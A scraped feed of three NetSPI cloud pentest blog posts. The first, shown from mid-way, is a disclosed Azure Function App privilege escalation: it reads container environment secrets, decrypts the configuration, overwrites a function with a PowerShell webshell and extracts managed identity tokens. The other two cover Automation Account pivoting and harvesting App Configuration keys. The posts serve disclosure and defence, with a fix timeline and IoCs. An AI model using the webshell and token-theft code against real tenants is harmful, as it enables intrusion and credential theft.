$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses xml files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptorDescriptorDeserializer, Microsoft.AspNetCore.DataProtection, Version=3.1.18.0, Culture=neutral, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="https://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environmental variables for different PIDs that are listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.
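
If you would rather stay in PowerShell than use CyberChef, the same AES-CBC decryption can be scripted. This is a minimal sketch that assumes $encryptedContext holds the dot-separated “encryptedContext” value fetched from the SAS URL, and it reuses the container encryption key shown above:

# Split the blob into the IV (first portion) and ciphertext (middle portion) 
$parts = $encryptedContext.Split(".") 

# AES defaults to CBC mode with PKCS7 padding, matching the CyberChef recipe 
$aes = [System.Security.Cryptography.Aes]::Create() 
$aes.Key = [Convert]::FromBase64String("bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=") 
$aes.IV  = [Convert]::FromBase64String($parts[0]) 

$cipher = [Convert]::FromBase64String($parts[1]) 
$plain  = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length) 
[System.Text.Encoding]::UTF8.GetString($plain) 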

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function 
processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use BurpSuite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with the PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the ETag as the “If-Match” Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed 
a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. 
Pass a name in the query string or in the request body for a 
personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: 
",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 
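
If you prefer scripting the overwrite instead of using Burp, a rough PowerShell equivalent of the GET and PUT requests above might look like this (a sketch; header handling differs slightly between Windows PowerShell and PowerShell 7):

$headers = @{ "x-functions-key" = "Q[REDACTED]=" } 
$uri = "https://vfspoc2.azurewebsites.net/admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1" 

# Fetch the current function code to capture its ETag 
$resp = Invoke-WebRequest -Uri $uri -Headers $headers 
$etag = @($resp.Headers["ETag"])[0] 

# Overwrite the function, matching on the ETag we just retrieved 
# (.\run.ps1 holds the modified webshell code shown above) 
Invoke-WebRequest -Method Put -Uri $uri -Headers ($headers + @{ "If-Match" = $etag }) -Body (Get-Content .\run.ps1 -Raw) 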

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} -Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let’s recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  2. Abuse the undocumented VFS API to read arbitrary files from the containers.
  3. Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
  4. Using the Linux container, read the process environmental variables. 
  5. Use the variables to access configuration information in a SAS token URL. 
  6. Decrypt the configuration information with the variables. 
  7. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

The post Escalating Privileges with Azure Function Apps appeared first on NetSPI.

]]>
Pivoting with Azure Automation Account Connections https://www.netspi.com/blog/technical-blog/cloud-pentesting/azure-automation-account-connections/ Thu, 16 Feb 2023 15:00:00 +0000 https://www.netspi.com/azure-automation-account-connections/ Discover a helpful function for enumerating potential pivot points from an existing Azure Automation Account with Contributor level access.

The post Pivoting with Azure Automation Account Connections appeared first on NetSPI.

]]>
Intro 

Azure Automation Accounts are a frequent topic on the NetSPI technical blog, to the point that we compiled our research into a presentation for the DEFCON 30 Cloud Village and the Azure Cloud Security Meetup Group. We’re always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.

Passing the Identity in Azure Active Directory 

As a primer, an Azure Active Directory (AAD) identity (User, App Registration, or Managed Identity) can have a role (Contributor) on an Automation Account that allows them to modify the account. The Automation Account can have attached identities that allow the account to authenticate to Azure AD as those identities. Once authenticated as the identity, the Automation Account runbook code will then run any Azure commands in the context of the identity. If that Identity has additional (or different) permissions from those of the AAD user that is writing the runbook, the AAD user can abuse those permissions to escalate or move laterally.

Simply put, Contributor on the Automation Account allows an attacker to be any identity attached to the Automation Account. These attached identities can have additional privileges, leading to a privilege escalation for the original Contributor account. 

Available Identities for Azure Automation Accounts 

There are two types of identities available for Automation Accounts: Run As Accounts and Managed Identities. The Run As Accounts will be deprecated on September 30, 2023, but they have been a source of several issues since they were introduced. When initially created, a Run As Account will be granted the Contributor role on the subscription it is created in.  

These accounts are also App Registrations in Azure Active Directory that use certificates for authentication. These certificates can be extracted from Automation Accounts with a runbook and used for gaining access to the Run As Account. This is also helpful for persistence, as App Registrations typically don’t have conditional access restrictions applied. 

For more on Azure Privilege Escalation using Managed Identities, check out this blog.

Screenshot of the Run As account type, one of two identities available for Azure Automation Accounts.

Managed Identities are the currently recommended option for using an execution identity in Automation Account runbooks. Managed Identities can either be system-assigned or user-assigned. System-assigned identities are tied to the resource that they are created for and cannot be shared between resources. User-assigned Managed Identities are a subscription level resource that can be shared across resources, which is handy for situations where resources, like multiple App Services applications, require shared access to a specific resource (Storage Account, Key Vault, etc.). Managed Identities are a more secure option for Automation Account Identities, as their access is temporary and must be generated from the attached resource.

A description of a system-assigned identity in Azure Automation Account.

Since Automation Accounts are frequently used to automate actions in multiple subscriptions, they are often granted roles in other subscriptions, or on higher level management groups. As attackers, we like to look for resources in Azure that can allow for pivoting to other parts of an Azure tenant. To help in automating this enumeration of the identity privileges, we put together a PowerShell script. 

Automating Privilege Enumeration 

The Get-AzAutomationConnectionScope function in MicroBurst is a relatively simple PowerShell script that uses the following logic:

  • Get a list of available subscriptions 
    • For each selected subscription 
      • Get a list of available connections (Run As or Managed Identity) 
      • Build the Automation Account runbook to authenticate as the connection, and list available subscriptions and available Key Vaults 
      • Upload and run the runbook 
      • Retrieve the output and return it
      • Delete the runbook 

In general, we are going to create a “malicious” automation runbook that goes through all the available identities in the Automation Account to tell us the available subscriptions and Key Vaults. Since the Key Vaults utilize a secondary access control mechanism (Access Policies), the script will also review the policies for each available Key Vault and report back any that have entries for our current identity. While a Contributor on a Key Vault can change these Access Policies, it is helpful to know which identities already have Key Vault access. 

The usage of the script is simple. Just authenticate to the Az PowerShell module (Connect-AzAccount) as a Contributor on an Automation Account and run “Get-AzAutomationConnectionScope”. The verbose flag is very helpful here, as runbooks can take a while to run, and the verbose status update is nice.

PowerShell script for automating the enumeration of identity privileges.
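
For reference, a minimal run looks something like the following (the import path is an assumption based on how the other MicroBurst functions are loaded; adjust it to wherever the script lives in your copy of the toolkit):

# Load MicroBurst (or dot-source the individual script), authenticate, and run the enumeration 
Import-Module .\MicroBurst\MicroBurst.psm1 
Connect-AzAccount 
Get-AzAutomationConnectionScope -Verbose 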

Note that this will also work for cross-tenant Run As connections. As a proof of concept, we created a Run As account in another tenant (see “Automation Account Connection – dso” above), uploaded the certificate and authentication information (Application ID and Tenant) to our Automation Account, and the connection was usable with this script. This can be a convenient way to pivot to other tenants that your Automation Account is responsible for. That said, it’s rare for us to see a cross-tenant connection like that.

As a final note on the script, the “Classic Run As” connections in an older Automation Account will not work with this script. They may show up in your output, but they require additional authentication logic in the runbook, and given the low likelihood of their usage, we’ve opted to avoid adding the logic in for those connections. 

Indicators of Compromise 

To help out the Azure defenders, here is a rough outline on how this script would look in a subscription/tenant from an incident response perspective: 

  1. Initial Account Authentication 
    a.   User/App Registration authenticates via the Az PowerShell cmdlets 
  2. Subscriptions / Automation Accounts Enumerated 
    a.   The script has you select an available subscription to test, then lists the available Automation Accounts to select from 
  3. Malicious Runbook draft is created in the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/write
    b.   Microsoft.Automation/automationAccounts/runbooks/draft/write 
  4. Malicious Runbook is published to the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/publish/action 
  5. Malicious Runbook is executed as a job
    a.   Microsoft.Automation/automationAccounts/jobs/write 
  6. Run As connections and/or Managed Identities should show up as authentication events 
  7. Malicious Runbook is deleted from the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/delete 

Providing the full rundown is a little beyond the scope of this blog, but Lina Lau (@inversecos) has a great blog on detections for Automation Accounts that covers a persistence technique I outlined in a previous article, Maintaining Azure Persistence via Automation Accounts. Lina’s blog should also cover most of the steps that we have outlined above. 

For additional detail on Automation Account attack paths, take a look at Andy Robbins’ blog, Managed Identity Attack Paths, Part 1: Automation Accounts.

Conclusion 

While Automation Account identities are often a necessity for automating actions in an Azure tenant, they can allow a user (with the correct role) to abuse the identity permissions to escalate and/or pivot to other subscriptions.

The function outlined in this blog should be helpful for enumerating potential pivot points from an existing Automation Account where you have Contributor access. From here, you could create custom runbooks to extract credentials, or pivot to Virtual Machines that your identity has access to. Alternatively, defenders can use this script to see the potential blast radius of a compromised Automation Account in their subscriptions. 

Ready to improve your Azure security? Explore NetSPI’s Azure Cloud Penetration Testing solutions. Or check out these blog posts for more in-depth research on Azure Automation Accounts:  

The post Pivoting with Azure Automation Account Connections appeared first on NetSPI.

]]>
How to Gather Azure App Configurations https://www.netspi.com/blog/technical-blog/cloud-pentesting/gathering-azure-app-configurations/ Thu, 08 Dec 2022 16:00:00 +0000 https://www.netspi.com/gathering-azure-app-configurations/ Learn how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs.

The post How to Gather Azure App Configurations appeared first on NetSPI.

]]>
Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.

TL;DR

The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.

What are App Configurations?

The App Configuration service is a very simple service. Provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a really simple way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.

Gathering Access Keys

Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks. 

Regardless of the type of key that an attacker acquires, this can lead to access the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.

To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/action” permission.

From the portal, you can copy out the connection string directly from the “Access keys” menu.

An example of the portal in an ap configuration service.

This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.

Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.

An example of an app configuration access key found in public data sources.
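
A rough sketch of that enumeration with the Az cmdlets is shown below; the resource group is parsed out of the resource Id, since the exact property layout can vary between Az.AppConfiguration versions:

# List App Configuration stores and pull the access keys for each one 
Get-AzAppConfigurationStore | ForEach-Object { 
    # Resource group parsed from the resource Id ("/subscriptions/<sub>/resourceGroups/<rg>/...") 
    $rg = ($_.Id -split "/")[4] 
    Get-AzAppConfigurationStoreKey -Name $_.Name -ResourceGroupName $rg 
} 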

Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.

Using the Keys

Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.

This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.

The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.
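
Usage looks roughly like the following; note that the parameter name for the connection string is an assumption here, so check the function’s help in MicroBurst for the exact syntax:

# Load the function and dump the key-value pairs for a given connection string 
Import-Module .\MicroBurst\Misc\Get-AzAppConfiguration.ps1 
Get-AzAppConfiguration -ConnectionString "Endpoint=https://<name>.azconfig.io;Id=<id>;Secret=<secret>" 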

A list of configuration values from the Get-AzAppConfiguration function.

In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.

IoCs

Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:

  • Azure Activity Log – List Access Keys
    • Category – “Administrative”
    • Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
    • Status – “Started”
    • Caller – <UPN of account listing keys>
An example of an app configuration audit log, capturing details of the account used to access data.
  • App Configuration Service Logs

Conclusions

